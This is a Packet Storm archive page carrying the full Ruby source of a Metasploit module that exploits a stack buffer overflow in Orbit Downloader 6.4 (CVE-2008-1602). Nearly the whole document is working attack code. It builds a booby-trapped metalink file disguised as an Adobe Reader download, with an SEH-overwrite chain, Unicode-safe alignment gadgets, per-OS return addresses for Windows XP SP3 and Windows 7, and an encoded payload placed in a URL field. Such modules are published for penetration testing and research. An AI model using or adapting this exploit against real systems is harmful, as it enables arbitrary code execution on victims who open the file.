what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Orbit Downloader URL Unicode Conversion Overflow

Orbit Downloader URL Unicode Conversion Overflow
Posted Feb 24, 2012
Authored by Diego Juarez, juan vazquez | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the "File->Add Metalink..." option.

tags | exploit, overflow
advisories | CVE-2008-1602, OSVDB-44036
SHA-256 | 3fabd80b37cf0e1969d54e9e5602e17e7766d95225a456a310cee421d520516c

Orbit Downloader URL Unicode Conversion Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Orbit Downloader URL Unicode Conversion Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Orbit Downloader.
The vulnerability is due to Orbit converting an URL ascii string to unicode
in a insecure way with MultiByteToWideChar.
The vulnerability is exploited with a specially crafted metalink file that
should be opened with Orbit through the "File->Add Metalink..." option.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Diego Juarez', # Vulnerability discovery
'juan vazquez', # Metasploit module
],
'Version' => '$ $',
'References' =>
[
[ 'BID', '28541' ],
[ 'OSVDB', '44036' ],
[ 'CVE', '2008-1602' ],
[ 'URL', 'http://www.coresecurity.com/content/orbit-downloader' ],
],
'Payload' =>
{
'Space' => 2000,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' => { 'BufferRegister' => 'EAX' },
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x26\x3c",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Orbit Downloader 6.4 on Windows XP SP3',
{
'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
'Nop' => 0x46, # 004600 => add [esi+0x0],al
'AddEax' => "\x05\x15\x11", # add eax,0x11001500
'Offset' => 4
}
],
[ 'Orbit Downloader 6.4 on Windows 7',
{
'Ret' => 0x4b38, # p/p/r unicode compatible from orbitdm.exe
'Nop' => 0x46, # 004600 => add [esi+0x0],al
'AddEax' => "\x05\x16\x11", # add eax,0x11001600
'Offset' => 120
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 03 2008',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.metalink']),
], self.class)
end

def exploit

sploit = rand_text_alpha(4096 - "http://".length)
sploit << "\xff" * 2 # EIP => Access Violation
sploit << rand_text_alpha(120) # padding
sploit << "\x61\x62" # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
sploit << [target.ret].pack("v") # seh # ppr
sploit << target['Nop']
sploit << target['AddEax'] # eax align is os dependant
sploit << target['Nop']
sploit << "\x2d\x11\x11" # sub eax,0x11001100
sploit << target['Nop']
sploit << "\x50" # push eax
sploit << target['Nop']
sploit << "\xc3" # ret
sploit << rand_text_alpha(target['Offset']) # align shellcode to eax pointer
sploit << payload.encoded

metalink = %Q|
<?xml version="1.0" encoding="utf-8"?>
<metalink version="3.0" generator="Metalink Generator v1.00.0034" xmlns="http://www.metalinker.org/">
<publisher>
<name>Adobe</name>
<url>http://www.adobe.com/</url>
</publisher>
<description>Adobe Acrobat Reader</description>
<files>
<file name="AdbeRdr80_en_US.exe">
<version>8.0</version>
<language>en-US</language>
<os>Windows-x86</os>
<verification>
<hash type="md5">0ab5ce309f313ed028824251c798b35c</hash>
</verification>
<resources>
<url type="http" preference="100">http://#{sploit}.com/pub/adobe/reader/win/8.x/8.0/enu/AdbeRdr80_en_US.exe</url>
</resources>
</file>
</files>
</metalink>
|

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(metalink)

end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close